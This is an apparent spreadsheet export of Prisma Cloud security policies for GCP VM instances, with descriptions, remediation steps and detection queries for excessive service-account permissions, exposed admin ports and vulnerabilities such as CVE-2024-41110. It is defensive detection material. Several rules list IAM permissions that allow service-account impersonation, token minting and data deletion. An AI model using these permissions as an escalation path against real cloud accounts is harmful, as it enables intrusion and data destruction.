      <c r="AE2741" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2741" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>d564d3eb-a8c8-4b51-b4f4-23e7256670dd</t>
        </is>
      </c>
      <c r="AI2741" t="inlineStr">
        <is>
          <t>e457fb78-fc3d-4614-8d9a-82b067e57605</t>
        </is>
      </c>
      <c r="AJ2741" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2741" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2742">
      <c r="A2742" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS v3.0.0 (GCP) Level 1, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS Controls v8.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.2.0 (GCP), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS v1.1.0 (GCP), MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, New Zealand Information Security Manual (NZISM v3.4), NIST CSF v2.0, CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], Rehan, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO 27001:2013, ISO/IEC 27002:2013, CIS Controls v8.1, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS Controls v7.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS v2.0.0 (GCP) Level 1, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), CIS v1.3.0 (GCP), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2742" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2742" s="2" t="inlineStr"/>
      <c r="D2742" t="inlineStr"/>
      <c r="E2742" t="inlineStr"/>
      <c r="F2742" t="inlineStr"/>
      <c r="G2742" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2742" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2742" t="inlineStr">
        <is>
          <t>GCP VM instances with excessive service account permissions</t>
        </is>
      </c>
      <c r="L2742" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2742" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2742" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2742" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2742" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2742" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2742" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2742" t="inlineStr"/>
      <c r="T2742" t="b">
        <v>0</v>
      </c>
      <c r="U2742" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2742" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2742" t="inlineStr">
        <is>
          <t>This policy identifies VM instances with service account which have excessive permissions other than viewer/reader access. It is recommended that each instance that needs to call a Google API should run as a service account with the minimum permissions necessary for that instance to do its job. In practice, this means you should configure service accounts for your instances with the following process:
 - Create a new service account rather than using the Compute Engine default service account.
 - Grant IAM roles to that service account for only the resources that it needs.
 - Configure the instance to run as that service account.
 - Configure VM instance least permissive service account with only viewer/reader role until it is necessary to have more access.
Avoid granting more access than necessary and regularly check your service account permissions to make sure they are up-to-date.</t>
        </is>
      </c>
      <c r="X2742" t="inlineStr">
        <is>
          <t>Note: To change an instance's service account and access scopes, the instance must be temporarily stopped. To stop your instance, read the documentation for Stopping an instance. After changing the service account or access scopes, remember to restart the instance.
To change service account of the stopped instance:
1. Login to GCP portal 
2. Go to Compute Engine
3. Choose VM instances
4. Click on the reported VM instance for which you want to change the service account
5. If the instance is not stopped, click the Stop button. Wait for the instance to be stopped
6. Next, click the Edit button
7. Scroll down to the Service Account section, From the drop-down menu, select the desired service account
Note: To fix this alert either you have to associate service account which has only viewer access or if VM has desired service account and access then dismiss the alert for particular VM instance.
8. Click the Save button</t>
        </is>
      </c>
      <c r="Y2742" t="inlineStr"/>
      <c r="Z2742" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = name does not start with "gke-" and status equals RUNNING as X; config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' as Y; filter '($.X.serviceAccounts[*].email equals $.Y.user) and not($.Y.roles[*] contains projects or $.Y.roles[*] all equal roles/viewer)'; show X;</t>
        </is>
      </c>
      <c r="AA2742" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2742" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2742" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-171</t>
        </is>
      </c>
      <c r="AD2742" t="b">
        <v>1</v>
      </c>
      <c r="AE2742" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2742" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>c29d7ea0-3913-4635-85bd-c4e68aab0ba1</t>
        </is>
      </c>
      <c r="AI2742" t="inlineStr">
        <is>
          <t>d373d96e-ca35-418e-ba24-5fcb9d12319d</t>
        </is>
      </c>
      <c r="AJ2742" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2742" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2743">
      <c r="A2743" t="inlineStr"/>
      <c r="B2743" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2743" s="2" t="inlineStr"/>
      <c r="D2743" t="inlineStr"/>
      <c r="E2743" t="inlineStr"/>
      <c r="F2743" t="inlineStr"/>
      <c r="G2743" t="b">
        <v>0</v>
      </c>
      <c r="H2743"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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2743" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2743" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed admin ports on GCP VM instance with service account impersonation permissions</t>
        </is>
      </c>
      <c r="L2743" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2743" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2743" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2743" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2743" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2743" t="inlineStr"/>
      <c r="R2743" t="inlineStr"/>
      <c r="S2743" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2743" t="b">
        <v>0</v>
      </c>
      <c r="U2743" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2743" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2743" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky permissions to impersonate a service account.
Risky permissions on publicly exposed VM instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. An attacker with access to the privilege escalation permissions can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.
This policy checks for the following permissions:
'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the VM instance. Restrict public exposure of admin ports reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2743"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to ports (tcp/22, tcp/3389)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2743" t="inlineStr"/>
      <c r="Z2743" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on Admin ports','GCP VM instance with permissions to impersonate a service account')</t>
        </is>
      </c>
      <c r="AA2743" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2743" t="inlineStr">
        <is>
          <t>2024-06-04 11:15:25</t>
        </is>
      </c>
      <c r="AC2743" t="inlineStr"/>
      <c r="AD2743" t="b">
        <v>1</v>
      </c>
      <c r="AE2743" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2743" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>30dbc9f4-5f49-488a-b650-607197202b5a</t>
        </is>
      </c>
      <c r="AI2743" t="inlineStr">
        <is>
          <t>f8a8e005-e8c5-4e11-9bed-212b72899e09</t>
        </is>
      </c>
      <c r="AJ2743" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2743" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2744">
      <c r="A2744" t="inlineStr"/>
      <c r="B2744" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2744" s="2" t="inlineStr"/>
      <c r="D2744" t="n">
        <v>3</v>
      </c>
      <c r="E2744" t="n">
        <v>0</v>
      </c>
      <c r="F2744" t="n">
        <v>0</v>
      </c>
      <c r="G2744" t="b">
        <v>1</v>
      </c>
      <c r="H27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44" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2744" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2744" t="inlineStr">
        <is>
          <t>Authorization bypass risk due to a publicly exposed GCP VM instance with an unauthorized Docker API access vulnerability (Docker, CVE-2024-41110)</t>
        </is>
      </c>
      <c r="L2744" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2744" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2744" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2744" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2744" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2744" t="inlineStr"/>
      <c r="R2744" t="inlineStr"/>
      <c r="S2744" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2744" t="b">
        <v>0</v>
      </c>
      <c r="U2744" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2744" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2744" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have a known exploitable Authorization bypass vulnerability affecting Docker (CVE-2024-41110).
CVE-2024-41110 is a critical vulnerability in Docker that allows attackers to bypass authorization plugins (AuthZ) through specially crafted API requests, potentially leading to unauthorized actions and privilege escalation. This vulnerability affects Docker Engine versions 19.03.x and later, including Docker Desktop versions up to v4.32.0, specifically for users utilizing AuthZ plugins for access control.
Successful exploitation of CVE-2024-41110 allows attackers to bypass authorization controls, enabling them to execute unauthorized Docker commands and potentially escalate privileges. The fact that the GCP VM is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Docker (CVE-2024-41110) vulnerability and the public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2744" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirement by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to Internet
4. Update VPC firewall rule that allow Internet access (0.0.0.0/0)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make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-41110
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-41110</t>
        </is>
      </c>
      <c r="Y2744" t="inlineStr"/>
      <c r="Z2744" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-41110'))</t>
        </is>
      </c>
      <c r="AA2744" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2744" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:40</t>
        </is>
      </c>
      <c r="AC2744" t="inlineStr"/>
      <c r="AD2744" t="b">
        <v>1</v>
      </c>
      <c r="AE2744" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2744" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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44" t="inlineStr">
        <is>
          <t>df9049f7-b9b5-4158-9a18-7286d0d91229</t>
        </is>
      </c>
      <c r="AI2744" t="inlineStr">
        <is>
          <t>8d7946be-33dd-4e0b-aba1-4eea5088e667</t>
        </is>
      </c>
      <c r="AJ2744" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2744" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2745">
      <c r="A2745" t="inlineStr"/>
      <c r="B2745" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2745" s="2" t="inlineStr"/>
      <c r="D2745" t="n">
        <v>1158</v>
      </c>
      <c r="E2745" t="n">
        <v>0</v>
      </c>
      <c r="F2745" t="n">
        <v>38</v>
      </c>
      <c r="G2745" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2745" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2745" t="inlineStr">
        <is>
          <t>Data destruction risk due to a publicly exposed and vulnerable GCP VM instance with delete permissions</t>
        </is>
      </c>
      <c r="L2745" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2745" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2745" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2745" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2745" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2745" t="inlineStr"/>
      <c r="R2745" t="inlineStr"/>
      <c r="S2745" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2745" t="b">
        <v>0</v>
      </c>
      <c r="U2745" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2745" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2745" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with critical or high vulnerabilities and data destruction permissions.
Data destruction permissions on publicly exposed VM instances with critical or high vulnerabilities may allow an attacker to gain access to the vulnerable VM instances and leverage that access to delete cloud storage buckets, snapshots and images and destroy sensitive information stored in your cloud resources making irreversible damage to your organization.
This policy checks for the following data destruction permissions:
'compute.instances.delete', 'compute.disks.delete', 'compute.snapshots.delete', 'compute.images.delete', 'storage.buckets.delete', 'cloudsql.databases.delete', 'cloudsql.instances.delete', 'file.instances.delete'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the VM instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X274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45" t="inlineStr"/>
      <c r="Z2745" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with data destruction permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2745" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2745" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2745" t="inlineStr"/>
      <c r="AD2745" t="b">
        <v>1</v>
      </c>
      <c r="AE2745" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2745" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>45488d62-6abe-4938-9b7a-aaa44858540e</t>
        </is>
      </c>
      <c r="AI2745" t="inlineStr">
        <is>
          <t>b1ccf7df-d2c8-4588-8d06-b62738fd9745</t>
        </is>
      </c>
      <c r="AJ2745" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2745" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2746">
      <c r="A2746" t="inlineStr"/>
      <c r="B2746" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2746" s="2" t="inlineStr"/>
      <c r="D2746" t="n">
        <v>1</v>
      </c>
      <c r="E2746" t="n">
        <v>0</v>
      </c>
      <c r="F2746" t="n">
        <v>0</v>
      </c>
      <c r="G2746" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2746" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2746" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (ReportLab, CVE-2023-33733)</t>
        </is>
      </c>
      <c r="L2746" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2746" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2746" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2746" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2746" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2746" t="inlineStr"/>
      <c r="R2746" t="inlineStr"/>
      <c r="S2746" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2746" t="b">
        <v>0</v>
      </c>
      <c r="U2746" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2746" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2746" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-33733).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ReportLab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ReportLab (CVE-2023-33733) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X274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CVE-2023-33733
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33733</t>
        </is>
      </c>
      <c r="Y2746" t="inlineStr"/>
      <c r="Z2746" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33733'))</t>
        </is>
      </c>
      <c r="AA2746" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2746" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:13</t>
        </is>
      </c>
      <c r="AC2746" t="inlineStr"/>
      <c r="AD2746" t="b">
        <v>1</v>
      </c>
      <c r="AE2746" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2746" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>8d127bd2-dbbf-4310-9b3c-c49c610c8517</t>
        </is>
      </c>
      <c r="AI2746" t="inlineStr">
        <is>
          <t>67929415-2078-42d3-8ad7-d418eea8f085</t>
        </is>
      </c>
      <c r="AJ2746" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2746" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2747">
      <c r="A2747" t="inlineStr"/>
      <c r="B2747" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2747" s="2" t="inlineStr"/>
      <c r="D2747" t="inlineStr"/>
      <c r="E2747" t="inlineStr"/>
      <c r="F2747" t="inlineStr"/>
      <c r="G2747" t="b">
        <v>1</v>
      </c>
      <c r="H27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47" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2747" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2747" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to sensitive information detected in server response on GCP VM instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2747" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M2747" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2747" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2747" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2747" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2747" t="inlineStr"/>
      <c r="R2747" t="inlineStr"/>
      <c r="S2747" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2747" t="b">
        <v>0</v>
      </c>
      <c r="U2747" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2747" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2747" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with sensitive information detected in server responses and having risky IAM write permissions.
Sensitive information in server responses includes potential unauthorized access and exploitation. When combined with elevated instance permissions and sensitive credentials in the response, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'accessapproval.requests.approve', 'accessapproval.requests.dismiss', 'accessapproval.settings.delete', 'accessapproval.settings.update', 'accesscontextmanager.accessLevels.create', 'accesscontextmanager.accessLevels.delete', 'accesscontextmanager.accessLevels.replaceAll', 'accesscontextmanager.accessLevels.update', 'accesscontextmanager.accessPolicies.create', 'accesscontextmanager.accessPolicies.delete', 'accesscontextmanager.accessPolicies.setIamPolicy', 'accesscontextmanager.accessPolicies.update', 'accesscontextmanager.gcpUserAccessBindings.create', 'accesscontextmanager.gcpUserAccessBindings.delete', 'accesscontextmanager.gcpUserAccessBindings.update', 'accesscontextmanager.policies.create', 'accesscontextmanager.policies.delete', 'accesscontextmanager.policies.setIamPolicy', 'accesscontextmanager.policies.update', 'iam.roles.create', 'iam.roles.delete', 'iam.roles.undelete',  'iam.roles.update', 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccountKeys.create', 'iam.serviceAccountKeys.delete', 'iam.serviceAccounts.create', 'iam.serviceAccounts.delete', 'iam.serviceAccounts.disable', 'iam.serviceAccounts.enable', 'iam.serviceAccounts.setIamPolicy', 'iam.serviceAccounts.undelete', 'iam.serviceAccounts.update', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.actAs', 'compute.backendServices.setIamPolicy', 'compute.disks.removeResourcePolicies', 'compute.disks.setIamPolicy', 'compute.firewallPolicies.setIamPolicy', 'compute.globalOperations.setIamPolicy', 'compute.images.setIamPolicy', 'compute.instanceTemplates.setIamPolicy', 'compute.instances.removeResourcePolicies', 'compute.instances.setIamPolicy', 'compute.instances.setServiceAccount', 'compute.machineImages.setIamPolicy', 'compute.maintenancePolicies.setIamPolicy', 'compute.snapshots.setIamPolicy'
Immediate attention is required to review the server response, and add the WAAS rule to prevent this activity, review and grant only the least privileges required and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X2747" t="inlineStr">
        <is>
          <t>[WAAS]
1. Open Console, and go to 'Runtime Security' 
2. Create a WAAS rule by selecting the WAAS sub-menu item under the Defend menu.
3. Choose the relevant tab for the workload.
4. Follow the instructions to deploy the in-line rule found at https://docs.prismacloud.io/en/enterprise-edition/content-collections/runtime-security/waas/deploy-waas/hosts
5. Set the protection effect in the created WAAS rule to \"Prevent\" for the protection setting 'Detect Information Leakage'
[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Find the service account used by the Compute Engine instance
4. Navigate to the IAM service
5. Find the binding between the service account used by the Compute Engine instance and the role with risky permissions
6. Remove the binding
7. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y2747" t="inlineStr"/>
      <c r="Z2747" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-compute-instances-list') AND finding.name contains all ('GCP Compute Engine with IAM write access level','Sensitive information detected in server response')</t>
        </is>
      </c>
      <c r="AA2747" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2747" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:49</t>
        </is>
      </c>
      <c r="AC2747" t="inlineStr"/>
      <c r="AD2747" t="b">
        <v>1</v>
      </c>
      <c r="AE2747" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2747" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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47" t="inlineStr">
        <is>
          <t>84395978-8af4-4b54-a6b9-cf82aa5880a0</t>
        </is>
      </c>
